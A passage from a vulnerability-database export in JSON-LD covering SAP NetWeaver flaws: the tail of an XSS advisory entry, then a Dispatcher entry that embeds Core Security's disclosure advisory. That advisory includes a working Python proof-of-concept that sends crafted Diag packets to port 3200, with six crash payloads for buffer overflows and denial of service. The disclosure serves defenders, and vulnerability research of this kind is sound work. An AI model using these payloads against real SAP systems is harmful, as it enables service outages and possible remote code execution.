"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Part of the unspecified input passed to the RFC WSDL service lacks filtering before returning to the user, allowing the attacker to perform cross-site scripting attacks, which can be exploited by an attacker to obtain sensitive information or hijack a user session. ----------------------------------------------------------------------\n\nThe final version of the CSI 6.0 has been released. \nFind out why this is not just another Patch Management solution: http://secunia.com/blog/325/\n\n----------------------------------------------------------------------\n\nTITLE:\nSAP NetWeaver RFC WSDL Service Cross-Site Scripting Vulnerability\n\nSECUNIA ADVISORY ID:\nSA50884\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/50884/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=50884\n\nRELEASE DATE:\n2012-10-05\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/50884/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/50884/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=50884\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nERPScan has reported a vulnerability in SAP NetWeaver, which can be\nexploited by malicious people to conduct cross-site scripting\nattacks. This can be\nexploited to execute arbitrary HTML and script code in a user\u0027s\nbrowser session in context of an affected site. \n\nThe vulnerability is reported in version 7.02. Other versions may\nalso be affected. \n\nSOLUTION:\nApply SAP Note 1614834. \n\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nPROVIDED AND/OR DISCOVERED BY:\nAlexey Tyurin, ERPScan. \n\nORIGINAL ADVISORY:\n[DSECRG-12-034]:\nhttp://erpscan.com/advisories/dsecrg-12-034-sap-netweaver-rfc-wsdl-xss/\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-5640"
},
{
"db": "IVD",
"id": "63971686-1f52-11e6-abef-000c29c66e3d"
},
{
"db": "PACKETSTORM",
"id": "117148"
}
],
"trust": 0.81
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2012-5640",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "50884",
"trust": 0.7
},
{
"db": "IVD",
"id": "63971686-1F52-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "117148",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "63971686-1f52-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-5640"
},
{
"db": "PACKETSTORM",
"id": "117148"
}
]
},
"id": "VAR-201210-0562",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "63971686-1f52-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-5640"
}
],
"trust": 1.06917922
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "63971686-1f52-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-5640"
}
]
},
"last_update_date": "2022-05-17T22:47:47.899000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for SAP NetWeaver RFC WSDL Service Cross-Site Scripting Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/23559"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-5640"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://secunia.com/advisories/50884/http"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=50884"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://erpscan.com/advisories/dsecrg-12-034-sap-netweaver-rfc-wsdl-xss/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/50884/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/50884/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/325/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-5640"
},
{
"db": "PACKETSTORM",
"id": "117148"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "63971686-1f52-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-5640"
},
{
"db": "PACKETSTORM",
"id": "117148"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-10-11T00:00:00",
"db": "IVD",
"id": "63971686-1f52-11e6-abef-000c29c66e3d"
},
{
"date": "2012-10-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-5640"
},
{
"date": "2012-10-05T04:46:58",
"db": "PACKETSTORM",
"id": "117148"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-10-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-5640"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver RFC WSDL Service Cross-Site Scripting Vulnerability",
"sources": [
{
"db": "IVD",
"id": "63971686-1f52-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-5640"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting",
"sources": [
{
"db": "IVD",
"id": "63971686-1f52-11e6-abef-000c29c66e3d"
}
],
"trust": 0.2
}
}
var-201205-0132
Vulnerability from variot
The DiagiEventSource function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application. ----------------------------------------------------------------------
Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch
TITLE: SAP NetWeaver Denial of Service and Code Execution Vulnerabilities
SECUNIA ADVISORY ID: SA48980
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/48980/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=48980
RELEASE DATE: 2012-05-09
DISCUSS ADVISORY: http://secunia.com/advisories/48980/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/48980/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=48980
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Core Security Technologies has reported multiple vulnerabilities in SAP NetWeaver, which can be exploited by malicious people to cause a DoS (Denial of Service) and compromise a vulnerable system.
The vulnerabilities are reported in versions 7.0 EHP1 and 7.0 EHP2.
Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY: Martin Gallo, Core Security Technologies.
ORIGINAL ADVISORY: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. Advisory Information
Title: SAP Netweaver Dispatcher Multiple Vulnerabilities Advisory ID: CORE-2012-0123 Advisory URL: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities Date published: 2012-05-08 Date of last update: 2012-05-08 Vendors contacted: SAP Release mode: Coordinated release
- Vulnerability Information
Class: Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512, CVE-2012-2513, CVE-2012-2514
- Vulnerability Description
SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. By sending different messages, the different vulnerabilities can be triggered.
- Vulnerable packages
. SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313). SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869). Older versions are probably affected too, but they were not checked.
- Non-vulnerable packages
. Vendor did not provide this information.
- Vendor Information, Solutions and Workarounds
SAP released the security note https://service.sap.com/sap/support/notes/1687910 regarding these issues. Contact SAP for further information.
Martin Gallo proposed the following actions to mitigate the impact of the vulnerabilities:
- Disable work processes' Developer Traces for the 'Dialog Processing' component (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).
- Restrict access to the Dispatcher service's TCP ports (3200/3299) (for all vulnerabilities).
-
Restrict access to the work process management transactions SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).
-
Credits
These vulnerabilities were discovered and researched by Martin Gallo from http://www.coresecurity.com/content/services-overview-core-security-consulting-services. The publication of this advisory was coordinated by Fernando Miranda from http://www.coresecurity.com/content/corelabs-advisories .
- Technical Description / Proof of Concept Code
NOTE: (The tracing of 'Dialog processing' has to be in level 2 or 3 in order to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).
The following python script can be used to reproduce the vulnerabilities described below:
/----- import socket, struct from optparse import OptionParser
Parse the target options
parser = OptionParser() parser.add_option("-l", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3200) (options, args) = parser.parse_args()
def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet)
def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data)
def initialize(sock):
diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00"
user_connect =
"\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8"
support_data = "\x10\x04\x0b\x00\x20"
support_data+=
"\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93"
support_data+=
"\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00"
dpheader =
"\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
dpheader+= struct.pack("I", len(diagheader + user_connect +
support_data))
dpheader+=
"\x00\xff\xff\xff\xff\xff\xff "
dpheader+= "terminalXXXXXXX"
dpheader+=
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
send_packet(sock, dpheader + diagheader + user_connect + support_data)
def send_message(sock, message): diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00" step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01" eom = "\x0c" send_packet(sock, diagheader + step + message + eom)
Connect and send initialization packet
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((options.hostname, options.port)) initialize(connection) receive(connection)
-----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities.
8.1. SAP Netweaver DiagTraceR3Info Vulnerability
[CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver 'disp+work.exe' module process a specially crafted network packet. Malicious packets are processed by the vulnerable function 'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace is configured at levels 2 or 3 for the "Dialog processor" component of the "Dialog" work process handling the packet [2]. The following python code can be used to trigger the vulnerability:
/----- crash = "X"114 + "\xff\xff" # --> Unicode Address to call ! crash+= "Y"32 crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash send_message(connection, crash) -----/
8.2. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack against the vulnerable systems. The following python code can be used to trigger the vulnerability:
/----- crash = "\x12\x04\x18\xff\xff\xff\xffCrash!" send_message(connection, crash) -----/
8.3. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. The following python code can be used to trigger the vulnerability:
/----- crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8 send_message(connection, crash) -----/
8.4.
/----- crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51" send_message(connection, crash) -----/
8.5.
/----- crash = "\x10\x0c\x0e\x00\0a" + "A"*10 send_message(connection, crash) -----/
8.6. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack.
/----- crash = "\x10\x0f\x01\x00\x11" + "A"*17 send_message(connection, crash) -----/
- Report Timeline
. 2012-01-24: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for February 21st, 2012. 2012-01-24: Core sends an advisory draft with technical details. 2012-01-24: The SAP team confirms the reception of the issue and asks to use the security ID 582820-2012 for further communication. SAP also notifies its terms and conditions [3], and asks for Core to commit to that guideline. 2012-02-01: The Core Advisories Team communicates that it has its own guidelines for the advisories publication process, which may conflict with SAP's guidelines. In particular, Core does not guarantee that the publication of the advisory will be postponed until a fix or patch is made available by SAP. If information about this vulnerability is partially or completely leaked by a third party, the advisory would be released immediately as forced release. Despite this, the Core team commits to comply with SAP's guidelines as much as possible. 2012-02-21: First release date missed. 2012-02-22: Core asks for the status of the fix and notifies that the release date was missed. 2012-02-23: SAP notifies that, because the development team has to downport the solutions for a huge bunch of software releases, the earliest release date for the patches would be May 8th 2012. 2012-02-23: Core re-schedules the advisory publication to May 8th. 2012-04-16: Core asks if the patching process is still on track to release patches on May 8th and requests a status of the fix. 2012-04-16: Vendor notifies that the release date is still planned for May 8th, but due to quality control processes this date cannot be guaranteed. 2012-05-04: Core notifies that everything is ready for publication and requests the vendor to confirm the release date and the list of affected platforms (no reply received). 2012-05-07: Core asks again for the status of the fix. 2012-05-08: SAP notifies that they have released the security note 1687910 [4] on May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP also requests Core to remove all the technical information researched by Martin Gallo in [Sec. 8]. 2012-05-08: Core replies that the reporting of vulnerabilities is aimed at helping vulnerable users to understand and address the issues; the advisory will thus be released with the technical information. 2012-05-08: Advisory CORE-2012-0123 published.
- References
[1] http://www.sap.com/platform/netweaver/index.epx [2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm [3] SAP's legal information, terms and conditions http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46.
[4] SAP security note 1687910 https://service.sap.com/sap/support/notes/1687910.
- About CoreLabs
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
- Disclaimer
The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201205-0132",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.0 ehp1 (disp+work.exe 7010.29.15.58313)"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.0 ehp2 (disp+work.exe 7200.70.18.23869)"
},
{
"model": "netweaver ehp2",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver ehp1",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "BID",
"id": "53424"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002404"
},
{
"db": "NVD",
"id": "CVE-2012-2514"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-162"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2012-2514"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security - Corelabs",
"sources": [
{
"db": "BID",
"id": "53424"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-162"
}
],
"trust": 0.9
},
"cve": "CVE-2012-2514",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2012-2514",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2012-2514",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201205-162",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2012-2514",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2514"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002404"
},
{
"db": "NVD",
"id": "CVE-2012-2514"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-162"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The DiagiEventSource function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities. \nSuccessfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application. ----------------------------------------------------------------------\n\nBecome a PSI 3.0 beta tester!\nTest-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. \nDownload it here!\nhttp://secunia.com/psi_30_beta_launch\n\n----------------------------------------------------------------------\n\nTITLE:\nSAP NetWeaver Denial of Service and Code Execution Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA48980\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/48980/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=48980\n\nRELEASE DATE:\n2012-05-09\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/48980/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/48980/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=48980\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nCore Security Technologies has reported multiple vulnerabilities in\nSAP NetWeaver, which can be exploited by malicious people to cause a\nDoS (Denial of Service) and compromise a vulnerable system. \n\nThe vulnerabilities are reported in versions 7.0 EHP1 and 7.0 EHP2. \n\nFurther details available in 